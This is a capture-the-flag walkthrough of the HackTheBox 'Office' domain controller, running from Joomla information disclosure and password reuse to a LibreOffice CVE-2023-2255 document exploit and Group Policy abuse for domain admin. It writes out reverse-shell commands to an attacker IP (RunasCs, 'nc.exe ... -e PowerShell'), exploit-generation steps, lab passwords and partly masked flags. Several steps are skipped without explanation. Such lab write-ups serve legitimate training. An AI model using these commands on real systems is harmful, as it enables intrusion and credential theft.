Office is a hard-difficulty Windows machine featuring various vulnerabilities including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials and abusing Group Policies due to excessive Active Directory privileges.
Enumeration
Scope
IP Address: 10.10.11.3
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-14T17:06:04
|_ start_date: N/A
|_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s
when visiting https://10.10.11.3/, it gives me Forbidden massages
SMB Enumeration
No thing from smb
KERBEROS Enumeration
Found some users from kerbrute with jsmith.txt wordlist
Additional users found when using xato-10-million wordlist
I added all users found in a wordlist and then tried ASREPROASTING attack but it failed
HTTP Enumeration
http://10.10.11.3/
The site is joomla CMS
I visited http://10.10.11.3/readme.txt to get the version and search for CVE for it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://10.10.11.3/readme.txt | grep -i version
* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
<snip>
I found this version is affected by unauthenticated information disclosure vulnerability
I started Metasploit, searched for exploit with CVE number and found one
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ msfconsole -q
msf6 > search CVE-2023-23752
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks
msf6 > use 0
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
tasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the Joomla Application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
474 * Tony Stark Administrator Administrator@holograp 1 2023-04-13 23:27: 2024-01-24 13:00: Super Users
hy.htb 32 47
[+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db prefix if2tx_
db user root
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
We get database credentials:
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db user root
Since I get username of joomla but still don't know the password, I will reuse the password of the database I found against the web login form and the users we found before
Let's begin to enumerate the domain with these credentials and I will do the following
Run Bloodhound Ingestors
Enumerate the Shares
Searching for kerberoastable accounts
Run bloodhound.py to collect info and feed it into bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all
<snip>
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.office.htb
INFO: Done in 00M 21S
Start crackmapexec to view the shares and permissions on them
I run spider_plus module against the shares to explore their content fast
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus
SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
SPIDER_P... 10.10.11.3 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.10.11.3 445 DC [*] DIR: ['print$']
SPIDER_P... 10.10.11.3 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.3 445 DC [*] SIZE: 51200
SPIDER_P... 10.10.11.3 445 DC [*] OUTPUT: /tmp/cme_spider_plus
I found .pcap file located at SOC Analysis share, So I will download and examine it locally
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ cat /tmp/cme_spider_plus/10.10.11.3.json
<snip>
"SOC Analysis": {
"Latest-System-Dump-8fbc124d.pcap": {
"atime_epoch": "2023-05-07 20:59:54",
"ctime_epoch": "2023-05-07 20:59:54",
"mtime_epoch": "2023-05-10 14:51:42",
"size": "1.31 MB"
}
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis'
Password for [WORKGROUP\dwolfe]:
smb: \> ls
. D 0 Wed May 10 14:52:24 2023
.. DHS 0 Wed Feb 14 05:18:31 2024
Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023
smb: \> get Latest-System-Dump-8fbc124d.pcap
I will upgrade the webshell to p0wny.php to become more flexible
I didn't find useful things in the context of web_account as his home directory is empty, So I uploaded RunasCs.exe to get a shell with stark
Shell as tstark
.\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9b0db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764
PS C:\Windows\system32> whoami
office\tstark
PS C:\Users\tstark> type Desktop\user.txt
fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxx
User Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx
Shell as ppotts
looking for listening ports, there is non-standard port listening
Looking for the process that run this port revealed that its web server running
checking its permissions, the user ppotts has full access on it.
PS C:\xampp\htdocs\internal> icacls applications
icacls applications
applications CREATOR OWNER:(OI)(CI)(IO)(F)
OFFICE\PPotts:(OI)(CI)(NP)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
OFFICE\web_account:(OI)(CI)(RX,W)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX)
The community said that there is a CVE affected Libreoffice to create .odt file and get RCE from it
┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt'
File exploit.odt has been created !
Upload the exploit via webapp
Get a shell as ppotts
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159
Windows PowerShell
PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts
There is a job_offering.ps1 on music directory that is responsible to trigger the exploit
PS C:\Users\PPotts> type Music\job_offering.ps1
# Specify the path to the directory containing ODT files
$directoryPath = "C:\xampp\htdocs\internal\applications"
# Get all ODT files in the directory
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
foreach ($odtFile in $odtFiles) {
$newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension
$destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName
Copy-Item -Path $odtFile.FullName -Destination $destination -Force
del C:\xampp\htdocs\internal\applications\$odtFile
}
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
# Array to store LibreOffice process IDs
$libreOfficeProcessIds = @()
foreach ($odtFile in $odtFiles) {
# Start LibreOffice to open the ODT file
Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object {
# Store the process ID for later termination
$libreOfficeProcessIds = $_.Id
}
# Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
Start-Sleep -Seconds 7
# Wait for LibreOffice processes to finish opening files and then terminate them
Stop-Process -Id $libreOfficeProcessIds -Force
# Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
Start-Sleep -Seconds 5
}
Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force
# Put the MacroSecurityLevel key back to its original value
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /f
Shell as hhogan
There are stored credentials for hhogan in user ppotts session
When I tried to execute commands as that user, It asked for a password
PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami
Enter the password for office\hhogan:
Looking at bloodhound, User hhogan is a member of GPO MANAGERS which has the ability to add group policy object that can be abused to do malicious actions.
As we don't know the password of hhogan, We can extract it by decrypting DPAPI. We need the masterkey and credentials files which are located by default in <user>\AppData\Roaming\Microsoft\Credentials & <user>\AppData\Roaming\Microsoft\Protect\<user-sid>\GUID
We must provide a password for the command below but the is a post from SpectorOps that says " it can be done without a password, just provide /rpc options to mimikatz"
I will use --AddLocalAdmin and here are its options
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy
"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
Update the group policy to take effect
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/14/2024 9:59 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
abd037fa1e9078e44dxxxxxxxxxxxxxxxxx
